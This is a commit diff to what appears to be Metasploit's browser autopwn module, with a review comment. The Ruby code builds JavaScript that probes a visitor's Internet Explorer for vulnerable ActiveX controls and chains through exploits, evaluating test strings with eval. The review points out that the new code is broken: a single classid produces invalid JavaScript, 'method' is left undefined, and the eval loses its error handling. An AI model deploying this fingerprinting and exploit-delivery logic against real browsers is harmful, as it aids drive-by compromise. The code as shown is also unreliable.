Puts testAXO() on window so we can access it from anywhere
Also uses the new :method property which allows an array syntax. See ie_createobject for a usage example.
parent
f9a48ace48
commit
afe28523f3
|
@ -230,24 +230,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ENDJS
|
ENDJS
|
||||||
|
|
||||||
if (datastore['DEBUG'])
|
if (datastore['DEBUG'])
|
||||||
print_status("Adding debug code")
|
print_debug("NOTE: Debug Mode; javascript will not be obfuscated")
|
||||||
@init_js << <<-ENDJS
|
|
||||||
if (!(typeof(debug) == 'function')) {
|
|
||||||
function htmlentities(str) {
|
|
||||||
str = str.replace(/>/g, '>');
|
|
||||||
str = str.replace(/</g, '<');
|
|
||||||
str = str.replace(/&/g, '&');
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
function debug(msg) {
|
|
||||||
foo = document.getElementById("foo");
|
|
||||||
bar = document.createTextNode(msg);
|
|
||||||
foo.appendChild(bar);
|
|
||||||
bar = document.createElement("br");
|
|
||||||
foo.appendChild(bar);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
ENDJS
|
|
||||||
else
|
else
|
||||||
pre = Time.now
|
pre = Time.now
|
||||||
print_status("Obfuscating initial javascript #{pre}")
|
print_status("Obfuscating initial javascript #{pre}")
|
||||||
|
@ -424,20 +407,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if apo[:classid]
|
if apo[:classid]
|
||||||
# Then this is an IE exploit that uses an ActiveX control,
|
# Then this is an IE exploit that uses an ActiveX control,
|
||||||
# build the appropriate tests for it.
|
# build the appropriate tests for it.
|
||||||
method = apo[:vuln_test].dup
|
|
||||||
apo[:vuln_test] = ""
|
apo[:vuln_test] = ""
|
||||||
apo[:ua_name] = HttpClients::IE
|
apo[:ua_name] = HttpClients::IE
|
||||||
|
conditions = []
|
||||||
if apo[:classid].kind_of?(Array) # then it's many classids
|
if apo[:classid].kind_of?(Array) # then it's many classids
|
||||||
apo[:classid].each { |clsid|
|
apo[:classid].each { |clsid|
|
||||||
apo[:vuln_test] << "if (testAXO('#{clsid}', '#{method}')) {\n"
|
if apo[:method].kind_of?(Array) # then it's many methods
|
||||||
apo[:vuln_test] << " is_vuln = true;\n"
|
conditions += apo[:method].map { |m| "testAXO('#{clsid}', '#{m}')" }
|
||||||
apo[:vuln_test] << "}\n"
|
else
|
||||||
|
conditions.push "testAXO('#{clsid}', '#{method}')"
|
||||||
|
end
|
||||||
}
|
}
|
||||||
else
|
|
||||||
apo[:vuln_test] << "if (testAXO('#{apo[:classid]}', '#{method}')) {\n"
|
|
||||||
apo[:vuln_test] << " is_vuln = true;\n"
|
|
||||||
apo[:vuln_test] << "}\n"
|
|
||||||
end
|
end
|
||||||
|
apo[:vuln_test] << "if (#{conditions.join("||")}) {\n"
|
||||||
|
apo[:vuln_test] << " is_vuln = true;\n"
|
||||||
|
apo[:vuln_test] << "}\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
# If the exploit supplies a min/max version, build up a test to
|
# If the exploit supplies a min/max version, build up a test to
|
||||||
|
@ -670,7 +654,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# two methods should succeed if the object with the given
|
# two methods should succeed if the object with the given
|
||||||
# classid can be created.
|
# classid can be created.
|
||||||
js << <<-ENDJS
|
js << <<-ENDJS
|
||||||
function testAXO(axo_name, method) {
|
window.testAXO = function(axo_name, method) {
|
||||||
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
||||||
axobj = document.createElement("object");
|
axobj = document.createElement("object");
|
||||||
axobj.setAttribute("classid", "clsid:" + axo_name);
|
axobj.setAttribute("classid", "clsid:" + axo_name);
|
||||||
|
@ -691,7 +675,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
try {
|
try {
|
||||||
axobj = new ActiveXObject(axo_name);
|
axobj = new ActiveXObject(axo_name);
|
||||||
} catch(e) {
|
} catch(e) {
|
||||||
axobj = '';
|
// If we can't build it with an object tag and we can't build it
|
||||||
|
// with ActiveXObject, it can't be built.
|
||||||
|
return false;
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
||||||
|
@ -699,7 +685,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
return false;
|
return false;
|
||||||
}
|
};
|
||||||
ENDJS
|
ENDJS
|
||||||
# End of IE-specific test functions
|
# End of IE-specific test functions
|
||||||
end
|
end
|
||||||
|
@ -719,9 +705,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
document.body.innerHTML += (str);
|
document.body.innerHTML += (str);
|
||||||
}
|
}
|
||||||
window.next_exploit = function (exploit_idx) {
|
window.next_exploit = function (exploit_idx) {
|
||||||
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
|
||||||
if (!global_exploit_list[exploit_idx]) {
|
if (!global_exploit_list[exploit_idx]) {
|
||||||
#{js_debug("'End'")}
|
#{js_debug("'End<br>'")}
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||||
|
@ -739,8 +725,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
//document.body.appendChild(tn);
|
//document.body.appendChild(tn);
|
||||||
if (!test) {
|
if (!test) {
|
||||||
test = "true";
|
test = "true";
|
||||||
} else {
|
|
||||||
test = "try {" + test + "} catch (e) { is_vuln = false; }; is_vuln";
|
|
||||||
}
|
}
|
||||||
|
|
||||||
if (eval(test)) {
|
if (eval(test)) {
|
||||||
|
|
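Review bot: In the rewritten `if apo[:classid]` block (hunk at -424), `conditions` is only filled inside the `kind_of?(Array)` branch and, as far as the rendered columns show, the old `else` branch for a single classid is gone, so a module that passes one classid as a String ends up with `if () {` in `apo[:vuln_test]`, which is not valid JavaScript. The same block still interpolates `'#{method}'` after the `method = apo[:vuln_test].dup` assignment was removed; unless `method` is set outside the lines shown, that reference should be `apo[:method]`. Normalising both values would cover every combination on one path: `clsids = Array(apo[:classid])`, `methods = Array(apo[:method])`, then `conditions = clsids.product(methods).map { |c, m| "testAXO('#{c}', '#{m}')" }`. The hunk at -739 also drops the `try { … } catch (e) { is_vuln = false; }` wrapper around the string passed to `eval(test)`, so a malformed test now throws out of `next_exploit` instead of evaluating to false. The enclosing Ruby method starts and ends outside the hunks shown.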